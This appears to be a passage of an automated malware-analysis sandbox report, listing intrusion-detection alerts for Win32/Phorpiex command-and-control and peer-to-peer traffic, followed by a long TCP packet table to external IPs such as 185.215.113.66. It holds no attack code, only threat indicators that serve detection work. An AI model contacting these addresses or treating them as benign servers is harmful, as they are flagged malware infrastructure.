                                                                                                                                                                                                    2024-10-26T07:28:22.823567+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854568185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:28:25.992217+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.862892217.30.162.16140500UDP
                                                                                                                                                                                                    2024-10-26T07:28:26.988232+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85458791.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:26.988232+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85458791.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:30.262759+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85459791.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:30.262759+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85459791.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:31.006559+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.862892151.232.255.7340500UDP
                                                                                                                                                                                                    2024-10-26T07:28:33.292933+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85459991.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:33.292933+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85459991.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:36.304279+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85460191.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:36.304279+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85460191.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:39.350098+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.85460291.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:39.350098+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.85460291.202.233.14180TCP
                                                                                                                                                                                                    2024-10-26T07:28:41.024175+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.862892178.88.95.3340500UDP
                                                                                                                                                                                                    2024-10-26T07:28:43.541218+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854604185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:28:43.541218+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854604185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:28:46.037520+02002044077ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC1192.168.2.862892213.206.45.14740500UDP
                                                                                                                                                                                                    2024-10-26T07:28:46.521796+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.854606185.215.113.6680TCP
                                                                                                                                                                                                    2024-10-26T07:28:46.521796+02002848295ETPRO MALWARE Win32/Phorpiex.V CnC Activity M31192.168.2.854606185.215.113.6680TCP

                                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.085196972 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.090743065 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.090825081 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.091034889 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.096358061 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.995786905 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.995851040 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.995918036 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.995918036 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.995922089 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.995959044 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.995990992 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.995994091 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996011019 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996030092 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996042013 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996067047 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996095896 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996129036 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996136904 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996138096 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996138096 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996165991 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996176004 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:28.996206999 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.001545906 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.001597881 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.001686096 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.001686096 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151211977 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151254892 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151273966 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151293039 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151338100 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151338100 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151372910 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151441097 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151540041 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151575089 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151608944 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151621103 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151621103 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151643038 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151671886 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151676893 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151688099 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.151848078 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.152446032 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.152498960 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.152506113 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.152551889 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.152554035 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.152585983 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.152620077 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.152627945 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.152627945 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.152654886 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.152669907 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.152708054 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.153407097 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.153440952 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.153486013 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.153486013 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.153493881 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.153527021 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.153563976 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.153578997 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.153578997 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.153670073 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.154309988 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.154356003 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.154362917 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.154493093 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.156848907 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.156883001 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.156928062 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.156928062 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.306636095 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.306703091 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.306735039 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.306747913 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.306771994 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.306777000 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.306777000 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.306807995 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.306843042 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.306864977 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.306864977 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.306926966 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307125092 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307177067 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307230949 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307233095 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307233095 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307265043 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307300091 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307317019 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307317019 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307343960 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307352066 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307388067 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307408094 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307424068 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307440042 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307532072 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307550907 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307602882 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307610035 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307653904 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307689905 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307724953 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307770967 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307770967 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307770967 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.307770967 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308196068 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308269978 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308327913 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308330059 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308330059 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308378935 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308410883 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308429956 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308433056 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308464050 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308475971 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308501959 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308521032 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308548927 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308567047 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308579922 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308612108 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308612108 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308612108 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308742046 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308836937 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308871984 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308907032 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308923006 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308934927 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308957100 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.308991909 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309005022 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309005022 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309027910 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309122086 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309122086 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309335947 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309387922 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309407949 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309422016 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309441090 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309456110 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309477091 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309492111 CEST8049704185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309540033 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.309540033 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:29.592744112 CEST4970480192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:37.725210905 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:37.735600948 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:37.735685110 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:37.735831022 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:37.744091034 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.661850929 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.661880016 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.661928892 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.661950111 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.661961079 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.661961079 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.661968946 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.661992073 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662003040 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662003040 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662017107 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662023067 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662039995 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662046909 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662061930 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662061930 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662084103 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662089109 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662117958 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.662136078 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.667640924 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.667690992 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.667733908 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.667763948 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.667814970 CEST8049705185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.668081045 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.676239014 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:38.676326990 CEST4970580192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:39.720021009 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:39.725327015 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:39.726599932 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:39.764664888 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:39.770014048 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.631067991 CEST4970940500192.168.2.8178.90.122.209
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.636503935 CEST4050049709178.90.122.209192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.636600971 CEST4970940500192.168.2.8178.90.122.209
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.638092995 CEST4970940500192.168.2.8178.90.122.209
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.643425941 CEST4050049709178.90.122.209192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.643498898 CEST4970940500192.168.2.8178.90.122.209
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.648812056 CEST4050049709178.90.122.209192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654144049 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654180050 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654239893 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654264927 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654285908 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654299974 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654313087 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654324055 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654346943 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654371023 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654383898 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654393911 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654407024 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654416084 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654438019 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654463053 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654469013 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.654505968 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.659605980 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.659622908 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.659667015 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.659683943 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.659778118 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.659818888 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812088013 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812134981 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812148094 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812155008 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812179089 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812196970 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812201023 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812254906 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812350035 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812396049 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812400103 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812412977 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812428951 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812453985 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812464952 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812470913 CEST4970780192.168.2.8185.215.113.66
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812967062 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.812984943 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.813000917 CEST8049707185.215.113.66192.168.2.8
                                                                                                                                                                                                    Oct 26, 2024 07:26:40.813010931 CEST4970780192.168.2.8185.215.113.66
